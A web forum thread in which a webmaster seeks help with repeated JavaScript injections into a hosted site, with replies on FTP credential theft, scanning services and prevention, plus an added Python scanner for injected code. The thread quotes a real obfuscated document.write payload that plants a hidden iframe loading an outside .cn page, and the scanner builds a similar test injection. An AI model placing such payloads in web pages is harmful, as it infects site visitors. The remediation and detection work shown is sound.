The site (www.kshitij.com) is on a HostGator Linux server, using SSI, JS and simple HTML and some CGI scripts to update the site daily. No database is being used. Virus code is written automatically into the page code online; it's a strange JavaScript code. Most of the highly viewed pages are being attacked by a trojan virus. Guys, what would you do if this happened to you? She is the site's webmaster and she needs help ASAP. Please, can anyone help her? Thanks a bunch, folks.
Tell him to reset his FTP passwords; this is something that is happening to many individuals on many different web hosting providers. The Trojan seems to be a type of key logger. Check out this article: http://www.usatoday.com/tech/news/computersecurity/2008-03-31-javascript-hackers_N.htm
Do you care to share the signature of the malicious code? I had a site on one of my servers that had been infected and re-infected via injection of malicious JavaScript. Basically, it is done using an XSS attack to add JavaScript to several CSS files. What I did was to set up a simple scanner that looked for the signature code in all sites on my server, then back-traced logs at the time of infection to sort it out.
Hi, actually I was having problems logging in and posting here yesterday, so pingpong123 posted the problem on behalf of me. This is one type of the virus code:
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006e\u0061\u006c\u0079\u0073\u0074\u0069\u0063\u002e\u0063\u006e\u002f\u0069\u006e\u002e\u0063\u0067\u0069\u003f\u0032\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
There is lots of other code too. I have Kaspersky on my local machine, so it doesn't allow me to keep that code on my machine; meanwhile I have this one. The Trojan basically writes into any file which we use in the site using SSI, and also sometimes writes into JS files. It basically attacks the home page and highly viewed pages on the site. Regarding the FTP password, I changed it frequently, but no use.
1) Also, do you guys have any idea where the Trojan is coming to the website from? My client is accessing the website from India and the web server is in the USA. I would also like to know who is responsible for this?
2) Do you think the HostGator server is safe?
3) Is there any tool on the net by which I can test the current coding of all pages of the website, to make sure the code is correctly made, especially JS and HTML code?
I am looking for a permanent solution for this. Can anyone help me or suggest something about prevention? Thanks.
The signature code that I have seen has been a couple of different things:
1. An iframe that linked to a virus.
2. A JavaScript-encrypted link that also linked to the virus. This is done using the JavaScript eval() function.
3. A large list of links that were placed in a hidden div. SEO technique.
Just to clear things up, this is not a server-related issue; it's happening because that virus is most likely a key logger or packet sniffer and is logging your FTP credentials, at least that is what I have seen of this in the past year. This has impacted a large number of clients on a large number of hosting providers.
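As an added example (not code from anyone in this thread), here is the kind of "simple scanner" the earlier reply describes, written to look for the three signatures listed above plus the \uXXXX-escaped document.write() style of the sample posted. The sample page it is tested against is constructed here; the domain in it is a placeholder, and the file extensions and thresholds are assumptions.

```python
import os
import re

# Signatures named in this thread: a long run of JavaScript \uXXXX escapes (the
# document.write('\u003c...') sample), a hidden iframe, eval() of an encoded
# string, and a hidden div stuffed with links.
ESCAPE_RUN = re.compile(r"(?:\\u[0-9a-fA-F]{4}){10,}")
UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*(?:visibility:\s*hidden|display:\s*none)[^>]*>", re.I)
EVAL_ENCODED = re.compile(r"\beval\s*\(\s*(?:unescape|String\.fromCharCode|['\"])", re.I)
HIDDEN_DIV = re.compile(r"<div[^>]*(?:display:\s*none|visibility:\s*hidden)[^>]*>(.*?)</div>", re.I | re.S)
SCAN_EXT = (".html", ".htm", ".shtml", ".js", ".css")  # SSI, HTML and JS files, as in the thread

def decode_unicode_escapes(text):
    """Turn \\uXXXX sequences back into the characters they hide."""
    return UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)

def scan_text(text, min_links=5):
    """Return [(signature, evidence)] for one file's contents; [] means clean."""
    findings = [("escaped_js_run", decode_unicode_escapes(m.group(0))[:60])
                for m in ESCAPE_RUN.finditer(text)]
    decoded = decode_unicode_escapes(text)  # look through the obfuscation layer
    findings += [("hidden_iframe", m.group(0)) for m in HIDDEN_IFRAME.finditer(decoded)]
    findings += [("eval_of_encoded_string", m.group(0)) for m in EVAL_ENCODED.finditer(decoded)]
    for m in HIDDEN_DIV.finditer(decoded):
        links = len(re.findall(r"<a\s", m.group(1), re.I))
        if links >= min_links:
            findings.append(("hidden_link_block", "%d links" % links))
    return findings

def scan_tree(root):
    """Walk a web root and map each flagged file path to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample in the style of the injected code quoted above; the domain
# is a placeholder, not the one from the thread.
INJECTED_IFRAME = ('<iframe src="http://malware.example.invalid/in.cgi?2" '
                   'style="visibility: hidden; display: none"></iframe>')
INJECTED_LINE = "document.write('" + "".join("\\u%04x" % ord(c) for c in INJECTED_IFRAME) + "')"
```

Run scan_tree() against a fresh download of the site and diff its report between daily runs; a file that newly appears in the report pins down the re-infection time for the log back-trace mentioned above.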
Also, I found that the virus is written to JS files only. So is there a way on the net by which I can validate HTML code and JS file code?
sujata: Thanks for the JS code. I'll add it to my collection. VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware detected by antivirus engines. You can also try my Unmask Parasites service (beta). It checks web pages for hidden illicit content (i.e. invisible links, iframes, obfuscated scripts and redirects).
As I said, these hackings have nothing to do with your host; they were not infiltrated through a server vulnerability, so they are going to tell you that their servers are secure... because they are.
Hello EH Justin! I would like to ask you, in my case then, who is responsible? How do I prevent it, along with the password change? Please suggest. Thanks.
Hi UseShots! I have tried both tools. Among them, VirusTotal only scans files which are on the local machine, not online web pages. Unmask Parasites... I used it for whole-site checking; I don't know how many files it has scanned. Do I need to give it each URL to scan?
There are a lot of things you can do to help prevent it.
- Run an anti-virus scan on a regular basis.
- Make sure you reset your passwords every couple of months.
- Use strong passwords with a combination of uppercase letters, lowercase letters, and special characters.
- If your web host offers Secure FTP (SFTP), or FTP over TLS, then take advantage of that.
One more important thing I can suggest is to make sure you keep the scripts on your account up to date. Scripts like phpBB and WordPress are highly targeted and can contain large vulnerabilities if not updated regularly.
Send me a PM if you are still having problems. I have an idea on how to clean it all up just through FTP access.
sujata: You can save the web pages and JS files and then send them to VirusTotal. Check the screenshots of VirusTotal results for a few JS files here: http://www.finjan.com/MCRCblog.aspx?EntryId=1993
The Unmask Parasites service only checks the web page you specified. It's not anti-virus software. It just reveals suspicious hidden content. As a site owner you can spot unwanted stuff that may indicate that your website has been compromised. I.e. anti-virus software checks if the web page is harmful for your site visitors and doesn't care if it contains hidden links that are illicit but absolutely harmless for visitors. However, for site owners, the fact that their web pages contain unwanted hidden links may be strong evidence that their site has been hacked. This service is an early beta (only a couple of weeks old). I'm improving the detection capabilities of the service almost every day. I'm interested in hearing any feedback to improve the service (feature requests, false positives and negatives, malware obfuscation techniques, etc.)
Another service you can try is Google's Safe Browsing diagnostics. It checks if the site you specified was involved in malware dissemination during the last 90 days. For example: http://www.google.com/safebrowsing/diagnostic?site=kk6.us says that kk6.us is listed as suspicious and over the past 90 days, kk6.us/ appeared to function as an intermediary for the infection of 83 site(s). So if you find a script pointing to a third-party site, you can check that site. Unfortunately, Google's diagnostics are based on their crawler, and it may lack data about new and noindex sites. I see the "Google has not visited this site within the past 90 days." message quite often. Anyway, if the site is listed as suspicious, you should be alarmed. That's why, in the Unmask Parasites reports, you can see links to Google's Safe Browsing diagnostics pages for every domain found on a page.
P.S. I hope the message doesn't sound like shameless self-promotion. I tried to explain what you can expect from my service and share some information about other services.
A few days back my sites were also infected by this virus and trojans, and I did this: http://forums.digitalpoint.com/showthread.php?t=901622 Now everything is going fine.
RealTimeAgent: Thanks for sharing this information. So, keep your passwords secure and change them every time you suspect your site has been compromised.
Hi guys, sorry for the late update! Yes, I change my FTP password every time it comes, but it comes again and again. Now we are using the FileZilla FTP software provided by the hosting company; they told us to use it, but the problem is the same. We do check all machines in our office using Kaspersky, but how do we scan the dedicated web server? See, my client is using a dedicated server, and we are still confused about where it is coming from: is it the server's fault, as its firewall or antivirus is not strong, or our fault? That is still not clear. We are simply confused about what to do more...